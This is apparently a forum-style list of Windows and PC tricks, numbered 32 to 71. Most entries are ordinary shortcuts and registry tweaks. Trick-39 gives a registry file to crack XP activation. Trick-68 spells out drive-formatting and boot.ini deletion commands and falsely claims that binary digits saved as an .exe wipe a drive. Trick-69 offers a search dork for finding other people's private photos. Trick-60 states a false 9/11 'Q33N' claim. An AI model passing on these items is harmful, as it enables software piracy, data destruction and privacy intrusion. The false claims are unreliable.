We all know that after loading the file or copying the file from the boot disk to
temporary space the system requires a first time reboot.

Now if we press shift+f10 then the task manager will open and there we will find
that a process is running named setup.exe

now our task is to make the priority of this process maxm by right clicking on
that.

We are done.

Find ur xp installed in 10 min with tolerance 2 min
Trick-32
The Hidden Microsoft Song

Do you know the hidden Microsoft song? I hear this song while im
installing windows, where its almost at the end where have to
register your windows, enter your username.......etc.
Some people might not hear it because, your sound card driver isn't
installed.
If you want to know and hear that song, here it:
Go to
Start > Run > Copy and then Paste, or press and hold the Start + r .
Quote:
C:\windows\system32\oobe\images\title.wma

and hit Enter, of course ... Your media player should load the song,
and now you can hear it.


For those of you using Windows, do the following:

1.) Open an empty notepad file
2.) Type "Bush hid the facts" (without the quotes)

3 .) Save it as whatever you want.
4.) Close it, and re-open it.
Trick-33
Ping options

example .. In DOS .. c:>ping 192.168.0.1 -t

-t Ping the specifed host until interrupted

-a Resolve addresses to hostnames

-n count Number of echo requests to send

-l size Send buffer size

-f Set Don't Fragment flag in packet

-i TTL Time To Live

-v TOS Type Of Service

-r count Record route for count hops

-s count Timestamp for count hops

-j host-list Loose source route along host-list

-k host-list Strict source route along host-list

-w timeout Timeout in milliseconds to wait for each reply
Trick-34
FORMAT UR MOBILE PHONE (Nokia S60)

Here is the trick for complete formatting of ur virus infected or other problem
arriving mobile phone...

This trick is for almost all nokia models....

1.Switch off ur phone...
2.Remove sim card & memory chip...
3.Now press & hold keys - 3,*,call(green) ...
4.Then without leaving these three buttons press power button...
5.Formatting task will be started...
6.Remember its a very rare trick....
Trick-35
Get rid of Windows Messenger

Start->Run->"gpedit.msc""
-Computer Configuration
-Administrative Templates
-Windows Components
-Windows Messenger

Here you can enable
"Do not allow Windows Messenger to be run"
and
"Do not automatically start Windows Messenger initially"
Trick-36
How to remove programs not listed in
Add/Remove Programs

This problem can occur if the program you installed creates a registry key
name that is longer than 60 characters in length. Add/Remove Programs only
lists program names it locates up to the point it encounters this situation.Follow
the steps given to solve the problem.

* Go to C:\Windows\Inf folder. In the right pane, scroll down to sysoc.inf. Open
it with notepad. It will look like.
Quote:
[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
* The word "HIDE in an entry hides that application from your Add/Remove
Programs dialog box. To add ms messenger to the Add/Remove menu, delete
the word HIDE from its entry. Dont delete the ",(comma) after it.

* Save the file and restart your machine and now you can see that app listed in
the add/remove programs list



Automatically Close the "Non Responding" program!!!

When an application fails to respond during shutdown a dialog box is displayed
prompting the user to either end it now or to wait. Enabling the value
AutoEndTasks will take care of the non-responding application without user
intervention.

This is how to do it

Trick-37
To Implement for All Users

[Start] [Run] [Regedit]
Registry Key: HKEY_USERS\.DEFAULT\Control Panel\Desktop
Data Type: REG_SZ [String Value] // Value Name: AutoEndTasks
Modify/Create the Value Name [AutoEndTasks] according to the Value
Data listed below.
Value Data: [0 = AutoEndTasks Disabled / 1 = AutoEndTasks
Enabled]
Exit Registry and Reboot

To Implement for Individual Users

[Start] [Run] [Regedit]
Registry Key: HKEY_CURRENT_USER\Control Panel\Desktop
Data Type: REG_SZ [String Value] // Value Name: AutoEndTasks
Modify/Create the Value Name [AutoEndTasks] according to the Value
Data listed below.
Value Data: [0 = AutoEndTasks Disabled / 1 = AutoEndTasks
Enabled]
Exit Registry and Reboot

Trick-38
Remove shortcut arrow from desktop icons

Here's how you can remove those shortcut arrows from your
desktop icons in Windows XP.

1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOTlnkfile
3. Delete the Is Shortcut registry value.

You may need to restart Windows XP.
Trick-39
Crack the XP and validate your copy

use the trick . it is work 90%

paste the text in to Notepad and save it as a .reg file

execute it and make u r os as a genuine ........
Quote:
Windows Registry Editor Version
5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"ProductId"="55274-640-7450093-23464"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35, 35,32,37,34,2d,36,34,30,2d,\
37,34,35,30,30,39,33,2d,32,33,34,36,34,00,2e,00,00 ,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,62,fc,61,4c,e0,26,33,16 ,05,d3,54,e7,a0,de,00,00,\
00,00,00,00,49,36,c2,49,20,47,0c,00,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,33,33,35,30,30,00 ,00,00,00,00,00,00,65,10,\
00,00,74,99,dd,b0,f7,07,00,00,98,10,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 ,c4,ae,d6,1c
"LicenseInfo"=hex:e7,77,18,19,f8,08,fc,7d,e8,f0,df ,12,6e,46,cb,3f,ad,b2,dd,b9,\
15,18,16,c0,bc,c3,6a,7d,4a,80,8b,31,13,37,5a,78,a2 ,06,c8,6b,b9,d9,dd,cc,6a,\
9c,c5,9b,77,aa,07,8d,56,6a,7c,e4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,f d

Trick-40
Here are some Windows XP shortcut
keys

General keyboard shortcuts
CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
DELETE (Delete)
SHIFT+DELETE (Delete the selected item permanently without placing the
item in the Recycle Bin)
CTRL while dragging an item (Copy the selected item)
CTRL+SHIFT while dragging an item (Create a shortcut to the selected
item)
F2 key (Rename the selected item)
CTRL+RIGHT ARROW (Move the insertion point to the beginning of the
next word)
CTRL+LEFT ARROW (Move the insertion point to the beginning of the
previous word)
CTRL+DOWN ARROW (Move the insertion point to the beginning of the
next paragraph)
CTRL+UP ARROW (Move the insertion point to the beginning of the
previous paragraph)
CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
SHIFT with any of the arrow keys (Select more than one item in a window
or on the desktop, or select text in a document)
CTRL+A (Select all)
F3 key (Search for a file or a folder)
ALT+ENTER (View the properties for the selected item)
ALT+F4 (Close the active item, or quit the active program)
ALT+ENTER (Display the properties of the selected object)
ALT+SPACEBAR (Open the shortcut menu for the active window)
CTRL+F4 (Close the active document in programs that enable you to have
multiple documents open simultaneously)
ALT+TAB (Switch between the open items)
ALT+ESC (Cycle through items in the order that they had been opened)
F6 key (Cycle through the screen elements in a window or on the desktop)
F4 key (Display the Address bar list in My Computer or Windows Explorer)
SHIFT+F10 (Display the shortcut menu for the selected item)
ALT+SPACEBAR (Display the System menu for the active window)
CTRL+ESC (Display the Start menu)
ALT+Underlined letter in a menu name (Display the corresponding menu)
Underlined letter in a command name on an open menu (Perform the
corresponding command)
F10 key (Activate the menu bar in the active program)
RIGHT ARROW (Open the next menu to the right, or open a submenu)
LEFT ARROW (Open the next menu to the left, or close a submenu)
F5 key (Update the active window)
BACKSPACE (View the folder one level up in My Computer or Windows
Explorer)
ESC (Cancel the current task)
SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-
ROM from automatically playing)
CTRL+SHIFT+ESC (Open Task Manager)
Dialog box keyboard shortcuts


If you press SHIFT+F8 in extended selection list boxes, you enable extended
selection mode. In this mode, you can use an arrow key to move a cursor
without changing the selection. You can press CTRL+SPACEBAR or
SHIFT+SPACEBAR to adjust the selection. To cancel extended selection mode,
press SHIFT+F8 again. Extended selection mode cancels itself when you move
the focus to another control.
CTRL+TAB (Move forward through the tabs)
CTRL+SHIFT+TAB (Move backward through the tabs)
TAB (Move forward through the options)
SHIFT+TAB (Move backward through the options)
ALT+Underlined letter (Perform the corresponding command or select the
corresponding option)
ENTER (Perform the command for the active option or button)
SPACEBAR (Select or clear the check box if the active option is a check
box)
Arrow keys (Select a button if the active option is a group of option
buttons)
F1 key (Display Help)
F4 key (Display the items in the active list)
BACKSPACE (Open a folder one level up if a folder is selected in the Save
As or Open dialog box)
Microsoft natural keyboard shortcuts
Windows Logo (Display or hide the Start menu)
Windows Logo+BREAK (Display the System Properties dialog box)
Windows Logo+D (Display the desktop)
Windows Logo+M (Minimize all of the windows)
Windows Logo+SHIFT+M (Restore the minimized windows)
Windows Logo+E (Open My Computer)
Windows Logo+F (Search for a file or a folder)
CTRL+Windows Logo+F (Search for computers)
Windows Logo+F1 (Display Windows Help)
Windows Logo+ L (Lock the keyboard)
Windows Logo+R (Open the Run dialog box)
Windows Logo+U (Open Utility Manager)

Accessibility keyboard shortcuts
Right SHIFT for eight seconds (Switch FilterKeys either on or off)
Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or
off)
Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
SHIFT five times (Switch the StickyKeys either on or off)
NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
Windows Logo +U (Open Utility Manager)

Windows Explorer keyboard shortcuts
END (Display the bottom of the active window)
HOME (Display the top of the active window)
NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under
the selected folder)
NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
NUM LOCK+Minus sign (-) (Collapse the selected folder)
LEFT ARROW (Collapse the current selection if it is expanded, or select the
parent folder)
RIGHT ARROW (Display the current selection if it is collapsed, or select the
first subfolder)
Shortcut keys for Character Map


After you double-click a character on the grid of characters, you can move
through the grid by using the keyboard shortcuts:
RIGHT ARROW (Move to the right or to the beginning of the next line)
LEFT ARROW (Move to the left or to the end of the previous line)
UP ARROW (Move up one row)
DOWN ARROW (Move down one row)
PAGE UP (Move up one screen at a time)
PAGE DOWN (Move down one screen at a time)
HOME (Move to the beginning of the line)
END (Move to the end of the line)
CTRL+HOME (Move to the first character)
CTRL+END (Move to the last character)
SPACEBAR (Switch between Enlarged and Normal mode when a character
is selected)
Microsoft Management Console (MMC) main window keyboard
shortcuts
CTRL+O (Open a saved console)
CTRL+N (Open a new console)
CTRL+S (Save the open console)
CTRL+M (Add or remove a console item)
CTRL+W (Open a new window)
F5 key (Update the content of all console windows)
ALT+SPACEBAR (Display the MMC window menu)
ALT+F4 (Close the console)
ALT+A (Display the Action menu)
ALT+V (Display the View menu)
ALT+F (Display the File menu)
ALT+O (Display the Favorites menu)
MMC console window keyboard shortcuts
CTRL+P (Print the current page or active pane)
ALT+Minus sign (-) (Display the window menu for the active console
window)
SHIFT+F10 (Display the Action shortcut menu for the selected item)
F1 key (Open the Help topic, if any, for the selected item)
F5 key (Update the content of all console windows)
CTRL+F10 (Maximize the active console window)
CTRL+F5 (Restore the active console window)
ALT+ENTER (Display the Properties dialog box, if any, for the selected
item)
F2 key (Rename the selected item)
CTRL+F4 (Close the active console window. When a console has only one
console window, this shortcut closes the console)
Remote desktop connection navigation
CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
ALT+PAGE UP (Switch between programs from left to right)
ALT+PAGE DOWN (Switch between programs from right to left)
ALT+INSERT (Cycle through the programs in most recently used order)
ALT+HOME (Display the Start menu)
CTRL+ALT+BREAK (Switch the client computer between a window and a
full screen)
ALT+DELETE (Display the Windows menu)
CTRL+ALT+Minus sign (-) (Place a snapshot of the entire client window
area on the Terminal server clipboard and provide the same functionality
as pressing ALT+PRINT SCREEN on a local computer.)
CTRL+ALT+Plus sign (+) (Place a snapshot of the active window in the
client on the Terminal server clipboard and provide the same functionality
as pressing PRINT SCREEN on a local computer.)
Microsoft Internet Explorer navigation
CTRL+B (Open the Organize Favorites dialog box)
CTRL+E (Open the Search bar)
CTRL+F (Start the Find utility)
CTRL+H (Open the History bar)
CTRL+I (Open the Favorites bar)
CTRL+L (Open the Open dialog box)
CTRL+N (Start another instance of the browser with the same Web
address)
CTRL+O (Open the Open dialog box, the same as CTRL+L)
CTRL+P (Open the Print dialog box)
CTRL+R (Update the current Web page)
CTRL+W (Close the current window)
Trick-41
File Joining Without Software

1. Gather the file you wish to bind, and the image file, and place them in a
folder. I will be using C:\New Folder
-The image will hereby be referred to in all examples as mfgbhatti.jpg
-The file will hereby be referred to in all examples as New Text Document.txt

2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip.
From here on this will be referred to as (secret.rar)

3. Open command prompt by going to Start > Run > cmd

4. In Command Prompt, navigate to the folder where your two files are by
typing
cd location [ex: cd C:\New Folder]

5. Type [copy /b mfgbhatti.jpg + secret.rar mfgbhatti.jpg] (remove the brackets)

Congrats, as far as anyone viewing is concerned, this file looks like a JPEG,
acts like a JPEG, and is a JPEG, yet it now contains your file.

In order to view/extract your file, there are two options that you can take

a) Change the file extension from fluffy.jpg to fluffy.rar, then open and your file
is there
b) Leave the file extension as is, right click, open with WinRar and your file is
there
Trick-42
You wanna know who used your PC in
your absence

Who Used Your Pc In Your Absence,what Did He Do?

Go to -

"start > run >eventvwr.msc"

Events are stored in three log files: Application, Security, and System. These
logs can be reviewed and archived.
For our purposes we want the System log. Click on "System" in the left-hand
column for a list of events.
Look for a date and time when you weren't home and your computer should
have been off.
double click on the eg: info n it will show u the detail.
You can also use this log to see how long someone was on the computer. Just
look at the time the computer was turned on and off for that day.
Hope u all will like it.
Trick-43
Knowing who hacked You

Open dos command,go to -(Start/Run/type "command" without inverted commas and hit
enter),& in the MSDOS prompt,type:
netstat -a
(make sure you include the space in between the "t" and the "-a").

This command will show u the host name of the lamer and ofcorse urz also ..ur host name
will be under local address and his wud be under foreign address.. note any suspicious name
and every numbr u c aftr the host name under foreign address which is new and suspicious
there(numbers are ports but i consider u totally unaware).
After ur done,now type
Netstat -an (again a space between "t" and "-an")

this will list all connections in numerical form, which makes it a lot easier to trace malicious
users....Hostnames can be a little confusing if you don't know what you're doing (although
they're easily understandable, as we shall see later). Also, by doing this, you can also find
out what your own IP address is, which is always useful.

It wud look a bit like this
Proto.....Local Address.....Foreign Address.....State
TCP.......0.0.0.0:135.......0.0.0.0:0...........Li stening
TCP.......127.0.0.1:1026....0.0.0.0:0...........Li stening
TCP.......Your IP:Port......0.0.0.0:0...........Listening
TCP.......Your IP:Port......A New IP:Port.......Established

A New IP:Port -note that stuff
Now that u have a IP Addess and a host name,type
tracert type IP address/Hostname here

write whole thing there.. thats after u write tracert give a space then type A New IP we
found in last step.. give a / then write..Host name we found in first step.remember no port
there to be added..
This will trace the lamer which is prolly using a trojan on ur computer to do what he
wants..result will give u some ip addresses ..note all of them
now go to ip2location.com/free.asp
write ip addresses in the box and see where the ips belong to..some ips will give u ISPs like
mtnl ... last ip wud be his ip ..now call ur or his ISP & inform dem abt it!
Trick-44
How To Make Windows Vista Shut Down Faster

When you first install Windows Vista shutdown time is not really a big problem
but after a while it will be slower. With a registry trick, you can decrease the
amount of time Windows Vista waits for a service to stop, and make Windows
faster.

1. Open Registry Editor: go to the Start Menu, and type regedit in the Search
bar.Then press Enter.

2. Navigate to [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l]

3. Edit the "WaitToKillServiceTimeout"="20000" by right clicking on the key and
selecting Modify.

By default, the setting is at 20000 milliseconds (20 seconds.) Remember that
the default setting are the safest settings for your computer.

If you make this value smaller there is some risk involved. You can lower it in 4
seconds increments to see what is the best value that works for you.

Generally it is recommended not lower the value more than 3-5 seconds
because if you do this you can cause your computer to shut down improperly or
lose data
Trick-45
Hide Your Files In A Picture

Steps:
1. Save the picture of choice to your desktop.
2. Make a new .rar or .zip folder on your desktop.
3. Add the files you want to hide into the .zip or .rar
4. Click start menu, run, cmd.
5. In Command Prompt type cd &quot;desktop&quot; with the quotation marks.
6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg
( If you use .zip then: copy /b picturename.jpg + foldername.zip
outputfilename.jpg)
7. Now there should be the outputed file name with a .jpg extension on the
desktop.
( Do not close Command Prompt just yet )
8. Double click it to open the picture and check it out.
9. When your done looking, and want to view the hidden files
Type: ren outputfilename.jpg outputfilename.rar or zip
Now you're done!
A quick info-fact:
With this technique of hiding files in a jpg you can send this to anyone and they
just have to rename the file extension to .zip or .rar.
With this technique the Al-Qaeda operatives were able to send info to others
secretively.
Trick-46
Make utorrent download faster

hi guys,just follow this to increase your torrent download speed.

1.open utorrent.go to options then preferences.
2.select connections.
3.use the port 45682 or 80.u may choose which is good.
4.select everything in that page except 'randomize port'and proxy server.
5.now go to bandwidth and put max upload rate as 1.and max download rate as
0.
6.put global max connection as 130 and max connected peers as 70.
7.put number of upload as 3.
8.now go to queing and put max number of active torrents as 2 and max
number of active downloads as 1.set ratio to 150 and seed time to 0.

now u may notice the increase in speed.it may not work for everyone but
worked for me and my friend
Trick-47
Edit Any Website You Want

This is a java script which allows u to edit any website........ change every text
in the website.... but not save it!!!!!

1. Go to any website

2. Paste the below code in the address bar of your browser

3. You can edit the website , but you cannot save it.
Quote:
javascript:document.body.contentEditable='true'; document.designMode='on';
void 0

Trick-48
Orkut Tricks & Tips

A Star in Your Orkut Scrap Message :

type & # 9 7 3 3 just before your scrap message without space bar or spaces
b/w the characters & you will see Dashing and cool star Image/icon when you
submit your scrap message.

Reverse Scraps:

type & # 8 2 3 8 Just before your scrap message without spaces in b/w the
characters. the hole message or text will be reversed on submitting, it will look
cool

Hide or invisible , No Display Picture in Orkut

Open Micrsoft Paint or Adobe Photoshop, create a new image with pixel of
1x1ps smallest image/picture and then upload it By Microsoft internet explorer.
Following image/picture will be Not Clickable/unclickable and you get
hide/invisible now. Be RoXXx!!!

Type Cool Symbols in your Orkut Profile and Scrapbook or Scrap Messag
:

alt + 987 - , alt + 1 - _, alt + 2 - , alt + 3 - V,

alt + 4 - +, alt + 5 - , alt + 6 - +, alt + 7 - ,

alt + 8 - u, alt + 9 - , alt + 0178 - , alt + 0489 - ,

alt + 0756 - , alt + 0742 - , alt + 0719 - ,

alt + 0739 - , alt + 0729 -

you have keyboards you can try with your self with help of Alt+ number-a
Trick-49
Useful Symbols For MS Office

These Symbols can be used in MS Word, Excel,etc.

For : Alt+0169
For : Alt+0174
For : Alt+0153
For : Alt+0155
For 1 : Alt+0134
For : Alt+0248
For : Alt+0164
For : Alt+0171
For : Alt+0176
For : Alt+0177
For : Alt+0178
For : Alt+0179
For : Alt+0181
For : Alt+0182
For : Alt+0185
For : Alt+0187
For : Alt+0188
For : Alt+0189
For : Alt+0190
For : Alt+0197
For : Alt+0215
For : Alt+0216
For : Alt+0222
For : Alt+0223
For _ : Alt+1
Trick-50
How To Use Multiple Google Talk
Accounts In The Same Time

If you have several Google Talk accounts, you may want to run multiple
instances of Google Talk at once but by default you can't do it. Here is a little
tutorial on how you can do that:

1. Right click on the desktop.

2. Select New - Shortcut.

3. Paste this into the text box: "C:\program files\google\google
talk\googletalk.exe" /nomutex

If you didn't installed Google talk to the default location, change c:\program
files\google\google talk\googletalk.exe to the location you installed Google
Talk.

4. Click Next.

5. Give it a random name.

6. Click Finish.

Trick-51
How To Make Notepad Write On Its Own

A Notepad
that writes on it own is for sure a very weird thing but very funny in the same time. And
if you change the icon
of the file you create with the Notepad's, and replace the Notepad icon from your
friend's computer with this file for sure you will create a great prank.

1. Open Notepad.

2. Copy this script in Notepad:
Quote:
PHP Code:
set wshshell = wscript.CreateObject("wscript.shell")
wshshell.run "Notepad"
wscript.sleep 2000
wshshell.AppActivate "Notepad"
WshShell.SendKeys "H"
WScript.Sleep 500
WshShell.SendKeys "ell"
WScript.Sleep 500
WshShell.SendKeys "o "


The little program will make your Notepad type "Hello". You can always make your
custom message by replacing the letters between the " " signs with the ones you want.

You can add more lines like the following ones for more letters:

WScript.Sleep 500
WshShell.SendKeys "insert here your letter of group of letters "

3. Now save the file. Go to File->Save as. Type the name of the file with the
extension .vbs. For example if you want to choose the name Notepad, type
Notepad.vbs. Also be sure that File type is All files not Text file!

The file will look like this.

4. When you doubleclick on it, Notepad will start typing letters.
Trick-52
How To Open Word 2007 docx files in Word
2003

Office 2007 has a little different design than Office 2003 and some of us liked
the old version and didn't upgrade. Because Word 2007 saves files with the
default extension .docx which is not compatible with Word 2003, there were a
lot of misunderstandings regarding extensions.

But Microsoft came with a solution for this problem called Microsoft
Compatibility Pack.

To install it follow this steps:

1. Go and download the pack.

http://www.microsoft.com/downloads/d...displaylang=en

2. After you saved it on your computer open it and after you read the license
click Continue.

3. Once the process is done , you can enjoy opening .docx files on Word 2003.
Trick-53
How To Hack Window's Notification Area

This trick is completely useless but could be fun. You can write different words
near the clock on the notification area. You can always make a prank to your
friends or write something funny.

1. Go to Start -> Control Panel and double click on Regional and Language
Options.

2. Click on the 'Customize this format' button.

3. Go to Time tab.

Enter the character or symbols you want in the AM / PM fields. But remember
the maximum length is to 12 characters.

Click OK
Trick-54
How To Change Windows Vista Power
Buttons On A Laptop

On most Windows Vista laptops when you press the shutdown button from the
Start Menu your laptop doesn't shut down but it is going into sleep mode. If you
don't like that you can change this option to go shutdown when you press that
button.

1. Navigate to Control Panel
- Power Options.

2. Click on the link on the left that says 'Choose what the power buttons do'

3. You can change the power button to either Sleep, Hibernate or Shut Down,
or even nothing for the close the lid option.
Trick-55
How To Log On Automatically On Windows
Vista

Sometimes you don't have extremely important or sensitive information on your
computer ( for example a gaming computer ) and you don't like to log in every
single time you reboot your computer.

You can set your computer to log in automatically.

1. Type control userpasswords2 into the Start menu search box and press
Enter to go to Advanced User Accounts Control Panel.

2. Uncheck the box "Users must enter a user name and password to use
this computer", and then press Apply. Enter the right username and
password in the boxes shown. Press OK.

Now your computer will log in automatically each time you start it.
Trick-56
Can't continue ur game...dll files missing?

Hi! friends!! After installing a game u cant continue or start the games..Dont
worry

Dont worry just enter the site
Quote:
http://www.dll-files.com/dllindex/index.shtml



All the dll files will be available in alphabetical order..........

Just click on the dll file that was shown missing in the dialog box... when u start
that particular game or application..

The direct X will be useful and can be easily installed ...this site will provide free
download of all '.dll' files and could be installed without the help of an offline
directX installer.....
Trick-57
Disable Turn Off Option ..and ALT+F4 option

REGEDIT->HKEY_CURRENT_USER->SOFTWARE->MICROSOFT-
>WINDOWS->POLICIES->EXPLORER THEN GO TO RIGHT SIDE AND BY
RIGHT CLICK OF UR MOUSE CREATE NEW DWORD VALUE WITH NAME
NoClose and after creating click on it and give Value Data 1.

And Reboot your pc ..now your Turn Off option is disabled ..to Enable it again
..go to that directory by regedit ..and simply delete that created NoClose and
Log Off Your User and Log in again ..your Turn off Again Working
Trick-58
Hacking Windows SEND TO MENU

How often do you copy songs from a CD? Or some photos from a CD?

What do you do? You select the required files and do a CTRL C. Open the
destination folder and do a CTRL-V. Here is something you can benefit time
from. Customize your SEND TO MENU.

This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.
First youll need access to hidden files. So change your view settings to make
all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and
folders.
go to parent drive:/documents and settings/(user name)/send to

Open up my computer and locate your most used folders.

Create a shortcut of the most used folders in SEND TO FOLDER.You can do
this in a number of ways.

Right click -> send to desktop(create shortcut) and move the shortcut from the
desktop to the SEND TO FOLDER

Copy the most used folder and go to SEND TO FOLDER and right click ->
paste shortcut.

Also remember to rename the shortcuts to send to videos or send to potos. We
dont need confusion when we use the same later.

5. DONE

Trick-59
PDF Trick

Now u can listen to wats there in a pdf document instead of reading
the whole document....
Try out the following key

combinations for Acrobat 6.0 & 7.0:
- ctrl+ shift + b ---> To hear the whole document
ctrl + shift + v ---> To hear only the page
ctrl + shift + c ---> To resume
ctrl + shift + e ---> To stop
Trick-60
Notepad Knew About 9/11/2001 !

Amazing thing but true , Notepad knew about 9/11/2001 !
The flight number which hit the WTC in New York was Q33N !


See it yourself :-

1. Open Notepad
2. Type : Q33N
3. Now, go to Format menu
4. Choose Font.
5. Now, change the size to '72'
6. Now, change the font to 'Wingdings'
7. See what is displayed !


Trick-61
disable error reporting

1. Open Control Panel
2. Click on Performance and Maintenance.
3. Click on System.
4. Then click on the Advanced tab
5. Click on the error-reporting button on the bottom of the windows.
6. Select Disable error reporting.
7. Click OK
8. Click OK
Trick-62
Increase XP folder setting
Windows remembers 400 folder settings. When that number is reached some
settings aren't retained any longer. You can change this to 8000 by adding this
edit to the registry.

1. Copy the following (everything in the box) into notepdad.

QUOTE
Windows Registry Editor Version 5.00

[-HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell NoRoam\BagMRU]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell NoRoam\Bags]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell]
"BagMRU Size"=dword:00001f40

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell NoRoam]
"BagMRU Size"=dword:00001f40

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Policies\Explorer]
"NoSaveSettings"=dword:00000000

2. Save the file as folder8000.reg

3. Double click the file to import into your registry.
Trick-63
Shortcuts for Mozilla Firefox

CTRL + A Select all text on a webpage
CTRL + B Open the Bookmarks sidebar
CTRL + C Copy the selected text to the Windows clipboard
CTRL + D Bookmark the current webpage
CTRL + F Find text within the current webpage
CTRL + G Find more text within the same webpage
CTRL + H Opens the webpage History sidebar
CTRL + I Open the Bookmarks sidebar
CTRL + J Opens the Download Dialogue Box
CTRL + K Places the cursor in the Web Search box ready to type your search
CTRL + L Places the cursor into the URL box ready to type a website address
CTRL + M Opens your mail program (if you have one) to create a new email
message
CTRL + N Opens a new Firefox window
CTRL + O Open a local file
CTRL + P Print the current webpage
CTRL + R Reloads the current webpage
CTRL + S Save the current webpage on your PC
CTRL + T Opens a new Firefox Tab
CTRL + U View the page source of the current webpage
CTRL + V Paste the contents of the Windows clipboard
CTRL + W Closes the current Firefox Tab or Window (if more than one tab is
open)
CTRL + X Cut the selected text
CTRL + Z Undo the last action

Windows Keyboard Shortcuts for Mozilla Firefox
F1 Opens Firefox help
F3 Find more text within the same webpage
F5 Reload the current webpage
F6 Toggles the cursor between the address/URL input box and the current
webpage
F7 Toggles Caret Browsing on and off. Used to be able to select text on a
webpage with the keyboard
F11 Switch to Full Screen mode

Trick-64
Trick: Rename recycle bin
To change the name of the Recycle Bin desktop icon, click Start then goto Run,
write Regedit and press Enter. It opens Registry Editor. Now in Registry Editor
go to:

HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-1
01B-9F08-00AA002F954E}
and change the name "Recycle Bin" to whatever you want (don't type any
quotes).
Trick-65
Hidden bluetooth software in XP and vista

Now you don't need to install any software for your bluetooth device.
you don't know but you already had it in ur window xp nd vista
it can be used as:-

1.open run command
2.now type "fsquirt" without quotes
3.now just select whether u want 2 send or receive any file very easy.


Trick-66
Create Your Own Logon Message

Create Your Own Logon Message You can create a message that will appear
when you log on to your computer.

Click Start, click Run, type regedit, and then click OK. In the Registry Editor,
drill down to the following key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon

Right-click LegalNoticeCaption,
click Modify,

type My Windows XP Machine, and then click OK.

Right-click LegalNoticeText, click Modify, and then type your message.

Close the editor and your new message will appear at every log on.

This tip applies to computers that are part of a domain.

For stand-alone or peer-to-peer networks, the custom screen appears just
before the Welcome screen.

You may need to have an administrator account on your computer to make
changes to the registry. Incorrectly editing the registry may severely damage
your system.

At the very least, you should back up any valued data on the computer before
making changes to the registry.
Trick-67
Open Multiple instances of Yahoo Messenger

Today while browsing, I found a hack about the most popular instant
messenger - Yahoo Messenger. This Simple Hack allows you to Run multiple
instances (more then one) of Yahoo Messenger simultaneously on one PC.

YAHOO MESSENGER

* Go to Start >> Run >>
* Type regedit >> press Enter
* Go to HKEY_CURRENT_USER >> Software >> Yahoo >> pager >> Test
* Then Right click on test >> choose New >> Dword value .
* Rename it as Plural.
* Double click it >> assign a decimal value of 1.
* Close the registry and Restart yahoo messenger.

Hey Its All Done!! Now you can open N instances of yahoo messenger and
login into each from different yahoo ID.

Trick-68
how to format ur drives using notepad(just know it)

Dont try this!!! As soon as you save and Run it.. You can loose all your
Data ... This is just for information... Very Dangerous trick

Note: Using the information below is very risky and may cause permanent
loss of data, proceed with caution.

Step 1.
Write The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2.
Save as a .EXE -any name will do

Step 3.
Run the .exe

Alternative method:

format c:\ /Q/X -- this will format your drive c:
01100110011011110111001001101101011000010111010000 10000001
1000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X -- this will format your drive d:
01100110011011110111001001101101011000010111010000 100000011
001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X -- this will format your drive a:
01100110011011110111001001101101011000010111010000 1000000
11000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 1011110101
00110010111101010001

00100000011000110011101001011100011000100
110111101101111011101000010111001101001

011011100110100
Trick-69
Amazing Google Trick To Find Private
Pictures

Maybe you are a "voyeur".

Maybe you need some pictures for your school work.

Of course you can go to a dedicated website where you can find lot of free
pictures.

But you can also dig some private pictures directories.

Try this little code in Google, you may find lot of Non public pictures
Quote:
intitle:index.of +"Indexed by Apache::Gallery"
You can also narow your search by adding a word at the end, for example:
Quote:
intitle:index.of +"Indexed by Apache::Gallery" +dbilla
Maybe some of you guys use Apache Gallery for your own private pictures.

If you want to verify if your own private pictures ares indexed, just paste this
code in Google.
Quote:
www.YourSite intitle:index.of +"Indexed by Apache::Gallery"
(Replace YourSite by the server hosting your pictures (your URL.)

Example
Quote:
www.courirpouraider.ch intitle:index.of +"Indexed by Apache::Gallery"

Trick-70
Hack IE Title Bar

This can be an impressive bit of personalization. Use your name or moniker to
brand Internet Explorer. Go to
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ and left-click on
Main to change the string "Window Title" to whatever you wish.
Trick-71
Disabling the low disk-space balloon tip

When the disk space drops to a very low level, Windows displays a low disk
